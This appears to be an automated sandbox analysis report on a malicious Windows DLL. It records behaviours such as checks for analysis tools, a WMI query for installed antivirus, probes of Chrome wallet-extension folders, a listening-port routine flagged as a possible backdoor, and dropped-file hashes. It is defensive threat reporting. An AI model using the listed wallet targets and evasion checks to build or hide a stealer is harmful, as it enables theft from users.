Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: autoruns.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: ollydbg.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: regmon.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\iDQiPwFWUp\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\pnVcakKiqh\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Tries to access browser extension known for cryptocurrency wallets

Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C83C9A0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket,

12_2_6C83C9A0

ID:	1528465
Product:	CloudBasic
Start time:	23:23:05
Start date:	07.10.2024
Sample:	T8TY28UxiT.dll
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e0fa9d4894017e66af927bd72df16793
SHA1:	b504698acb8d172488277c4fc24a819b1009fdf3
SHA256:	fca664019d4465e2f9382c47da8acdf6739ee598191bd748c836a5f752031ad2
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_74818217-22c5-42ce-899a-bcb08de4d8f0\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	484C6F88BA6369BE2444E4E490ABC37A	A13EF14437A1F7F8E7385E23C86D3EDE7FCBE3BA	109579A88D31CE9AD6D6398E8BF8527425432269EE19FA6E65E08E1FAED01C58
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F6FDFD1F2C1453DB0EB8523A2DAD071F	1A260F9BF2B3E67655F02DA06CC3788CF236BD9B	6836E974DC021ADA1BCC93B5657DF447B23A4BE2E8E6B8681E17321B098F5DAB
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c1d756b83cd83ada8dfe11775affd7ce637fbf_7522e4b5_00197563-5a69-4158-9f6e-3a1ccb43392e\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	9CBB8919192E93363C4697FEAAD1DAF8	FD444F77E3BDB88D045C70C606702D9EE11424FD	0293C3511506525749A3F6BEB3383D1269A0C1C82605BA82A1A95FEBDB59D9C1
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c1d756b83cd83ada8dfe11775affd7ce637fbf_7522e4b5_26f3d910-2051-4880-bd51-43d22280fd44\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	93E361334983114C55FEA9C5F3A08717	E8EC7062F8AA377C9A1EE7118265FF7870788F45	C8A9C1663A7E0CEFC74E1D73190F3CCB14D90A23390A2681A0D1561795380823
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	75AD1131C8097AE62DD5CD13677A7CF2	FE8126908E582BB359C7FB2FED66C3DE3AC04A96	9D8C0384F6FDABC1E88CC173E530A5838708D87BB6D9612712F5C2DA928B5095
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_46437c3f-5aaf-4a65-a08d-004fbbab95c4\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	90990B9F16B2E69D26FFD182AF5E7D99	D3FFC960F9CC2EF4DB8F7A76BADFDFB348434C6B	C8043B2F1B871FED04BFE3A92D78FE59CCAF7E3C01490D36610DC13D044C6A03
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_525b7648-dbff-4ce4-ae33-ba140b501c2c\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	B16DFCFC28F1A4AD8FE13D54E4CA9ECB	9F140FDF38EE0AEC0D36884017E454204E2ED79A	1642386AD85DC5BAD10CD3E9D2A64203C97502374CA55299E93AA89A230571C7
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_b5951025-51df-40c5-b637-ef2fe51f054d\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	2009AE710B2E97FCF1BA97E328F6D806	4CB18742E5BECD280B24E613CBE45160F480B9DE	13311F0B73E04F7FAF01CF475FF047581533F8E2C270C514B595BFDA77F6AF3B
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_c5205c7c-acbc-4fb5-ac9d-ba3299c90495\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	E15C958509B3811A575E5DE0AD0899BD	1FC744FA2C9AD074C180EDFF0C17EBA015329780	168D7769AE8A3832F27317C5C080119AEB14DDC285C66FD1703FB7FABCB9C254
C:\ProgramData\Microsoft\Windows\WER\Temp\WER159F.tmp.dmp	Mini DuMP crash report, 14 streams, Mon Oct 7 21:24:48 2024, 0x1205a4 type	0F076E3B8336817C5B055B0FC238EDEB	F51A20D13C4D9FE4AE0C0436F5481A551618A294	03176FDDBA66DC1DDBCD60829A2ECC95F7B93F2E5E74E17C46FEBADE863DDB23
C:\ProgramData\Microsoft\Windows\WER\Temp\WER165C.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	F3F9D96059EEBF3B05FDAB34F693A3D8	49611ED6D387CAD4110B4E35EF2482E3F67E1695	AA0392E2DD575B991F9ECB8921A4F8FB918F2A010EF54C4CF9661913B0BFC377
C:\ProgramData\Microsoft\Windows\WER\Temp\WER168C.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F09F05B5B436028D210C6C180228FDA8	F47660A7FED7570C6E9AB03AD0F4D36F589B0544	0E49478FE46E50A63BF3E28255EFB226895DF711D7F020699EFC231CD5B9A12E
C:\ProgramData\Microsoft\Windows\WER\Temp\WER29E3.tmp.dmp	Mini DuMP crash report, 14 streams, Mon Oct 7 21:24:53 2024, 0x1205a4 type	693FF6B6178580EA43CC3549012A439E	A4496E9CDAA132576910ADBC0BAEF99283CFB7E8	A4EF4519283F745FD35734F3137FD9924C089935AD058C0B780E15EDA3AF35BD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A90.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	0F69A90FA50D5D2B2D5E796C2230664B	27BF87B5F4ED5BFFED3577D5919D31FC8B56231F	248E919499CAACFB4335680A15986FC96BDE965DF5B835E3A7E8898C937C1284
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB0.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	49E95EE434301D8C037598659436B636	FCC6BF129BED1EF61A54AB6DD8C7BA1CCECF1AC1	CA8D691FE11D2A8AF550DD10378471018FA5460D82C10D584AF675DD640E50AB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AEB.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 21:24:00 2024, 0x1205a4 type	773B8A43163A4F3FB3B1AECC40717944	5D53A0F1CDC810D053902614084EBC30B831679B	6F7DB72C0E8D4398D9E92DF8CA6A86180A1F5ADCA5955C9E4C9787DDBA2208C9
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AFA.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 21:24:00 2024, 0x1205a4 type	35A31184C2F09ADDDF8926F850C014E5	4195DE8E6F23C886D7F5D203C889AF81F578C54A	2FD88108F2BFCA69500526109878A45D1F35E393AC407A7F455033904C251D5D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BB7.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	4AFF25001C72F3B26186D455EDBA5584	C8F13919E9294E777E88276B183C7FFDBBA175CB	6F6B48B3E73FEDF24200BA7CF5AF87FDBC05438BE0493376AD10A4DC3DA2FEAF
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BB8.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	945C3804FFFF5614F47D113B780A333F	1821951C4FBAB70055E8BFDD6FA10DF17DECF5AF	720279A9B023258AAD35DABB1157DE89CC51427E2622A7D0B66A5E4582FA1825
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C06.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	68C91D37712E0F557031EE710DA82B6E	726D29E7F77D37B8DFB27157E365C6C650A9D436	38BD7665327355D92B5C5B314C2B49F6E667D156B1E012EB8E2EB09DD9DE23A5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C15.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	C9077646AF42192197357F9D42CD76D5	945042F4328A0D516015C0579A879D6B07D84AA5	2A07D1CED9B6553F80721BC71D9D56FE25944DD14C8352495ED8688D7E46B384
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6626.tmp.dmp	Mini DuMP crash report, 14 streams, Mon Oct 7 21:24:03 2024, 0x1205a4 type	D805B7D675E8C65C2D2AC914772CDE1B	50E805B07957CF365FE3576F94804E2FE54EB7B4	701E42D2E33607E1B1399D21FB2B44DCBBD812478950402A96F9ABD093ADEDA8
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6694.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	B9D8BB9EE67D1A9F454F6EEBDC375C00	3A119E293406EFBD7F5D6A635ABE052106B61E67	043B5E78A5559F44E2AA204F87F5EA9F2A025A4EC8AA4F843485DAAFBBB19B32
C:\ProgramData\Microsoft\Windows\WER\Temp\WER66C4.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	688BF4B60B2ABF559F33842E77700008	E0AE85904F90C078C9F4A3AC26F059A4BA9B84C9	A2F37F80947A7C41233F7872B2F6140F4C7EC1CE58AF84AA63633090E979646D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER71AF.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 21:24:06 2024, 0x1205a4 type	76002B225F6B497C6260835559B54AC4	E16226F1F84D947619FA414F1D165327383CC85B	0E970A3D1B997036F776CA485DECD483FED56A08C44BFAE4B32A839356294BFF
C:\ProgramData\Microsoft\Windows\WER\Temp\WER723C.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	2954951BD4D7A6824C705B80F5F95254	7714FFF863B95BF0DBEF89982CB54865A6E62BFD	4E933B2CB1767E70CA6744030B0695EFCE15C48767DA216E21882983803D7CEB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER726C.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F27B2EFA2D4B9F85B17D4194CCF0DBF7	6C4BD17CB2BC08F55C145B0C8B4231F74BF83A8B	F020D5E9146A3A13D2917122BD071997B21519F9F6B91A659EFB2FD167389553
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E9F.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 21:24:09 2024, 0x1205a4 type	613942EEFB2919018A97A0106F9E0A6D	895376F90C02BD5CE012155E054FB192DC79871D	BD56A6FCFE77FABD526A9B2417D2F064242E671A5EE16E65110B60594012FFCD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EDE.tmp.dmp	Mini DuMP crash report, 14 streams, Mon Oct 7 21:24:10 2024, 0x1205a4 type	335E130FF8899AA9BEAF9C3F6667744A	1B3A36EA481DFD15E0995D7164E5B2A3A215F005	3BF6C6C8BBE8C3AC48F8EB876413AF7411EA5D15E44B1BE71A10A2FD697CD77E
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FA9.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 21:24:10 2024, 0x1205a4 type	08A9B3FE361FFF672C06FA97BF232432	15241003B82E0DEC4744C5343CA0869D0D860CE8	067CAB2DD48BEE4F538AD51A13AA7888F121146740F6FEADE895C4E3ED25EA83
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8094.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	E50227B95D2A9F4F0DC41621704C8F4B	DB903F52AF0EE87821B1E041336D2A5867808417	CA8A8D77D9174636F978F48E30E0209624CD97CB559882EE6CD2F6C543630AA6
C:\ProgramData\Microsoft\Windows\WER\Temp\WER81BD.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	7D1A96045B392A4FDC64E93376C6C333	B218F5C2EAD59F1FAA7F774321C7D61CCBA895BF	CEBB931F79C62F63FEE649A73D7B295855C5A25363ED3AD8B694A0D6F80F3881
C:\ProgramData\Microsoft\Windows\WER\Temp\WER81DD.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	7F348D1AB86DAEE0D1C42DCAA2574BAE	F6E3D4412DEFFEA906280011B24753053E3323DD	67700E3408B68DBB2F7D690F552C059DDE02A3C39F8FC71E1D657C01015E5F80
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8289.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	EE8487DBCC48BF3AE734321A2CDE7D91	345CAA45E42ABF6B9C4FE91079D37210DC2F371D	784E9573F8C4BBDC51AD4641CB2A54FA19116F39AC093A6B70E668EF95E4B049
C:\ProgramData\Microsoft\Windows\WER\Temp\WER82C7.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	87DA953AFDF8C15A9E328AE0AAA35878	B331D4423DF9C5A94B2C81BDDEC2D631A4E9F80B	A33DA002227D113CB05E357933380F14DD14691601A966D964C9C2E68EF51801
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8345.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	AA7C56E0D79CA445364E7C560A01263E	609B99EADE928539BA6226B2081EDFACC04EE484	FB31D42A340CD6CF11A768CB96BC1F089513D240BE06A34DF91FA627078FD724
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	933095EEA794D36A300D23FDC28CFEEB	BF860F98A6AC94FD830AA52759AE832FBC4DFA5B	26BD0BA3C2BE5D2E26721BB759E822FA31C1BA8B98C66E21ECC3A3F52A21502A
C:\iDQiPwFWUp\0101a.zip	data	19272CF08FF2C653D4E41ABB591B6555	DAC044C83C6F0EE4C864A14560E12F2E1303A2EB	CFE2C55BD03367BFE99845F82D7AF659B0B46D58772A7173F4F8C54768CA3AE1
C:\iDQiPwFWUp\0101a_decrypted.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	292E7934CF89BA0E021CBCF6A3D8F9C0	F6F76A1A8C511EFCD28E93E39478B424A13A4348	1C2768D3D52C69A496F4385BFAED9DF016E8B2527CFA56E179F3CF5DC5DFCC22
C:\iDQiPwFWUp\7zxa.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	B9CC80955E914DA102905F5A01E2B277	988A74D50877B6DB701DFABABDFBCDDD16579F8A	B17FDCB67C490603882FFFA493EBE12F1DABFACAF0606DAFAA1FBDDAAF142CD1
C:\pnVcakKiqh\0101a.zip	data	19272CF08FF2C653D4E41ABB591B6555	DAC044C83C6F0EE4C864A14560E12F2E1303A2EB	CFE2C55BD03367BFE99845F82D7AF659B0B46D58772A7173F4F8C54768CA3AE1
C:\pnVcakKiqh\0101a_decrypted.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	292E7934CF89BA0E021CBCF6A3D8F9C0	F6F76A1A8C511EFCD28E93E39478B424A13A4348	1C2768D3D52C69A496F4385BFAED9DF016E8B2527CFA56E179F3CF5DC5DFCC22
C:\pnVcakKiqh\7zxa.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	B9CC80955E914DA102905F5A01E2B277	988A74D50877B6DB701DFABABDFBCDDD16579F8A	B17FDCB67C490603882FFFA493EBE12F1DABFACAF0606DAFAA1FBDDAAF142CD1
\Device\ConDrv	ASCII text, with CRLF line terminators	F1CA165C0DA831C9A17D08C4DECBD114	D750F8260312A40968458169B496C40DACC751CA	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8

Windows Analysis Report
T8TY28UxiT.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Windows Analysis Report T8TY28UxiT.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Windows Analysis Report
T8TY28UxiT.dll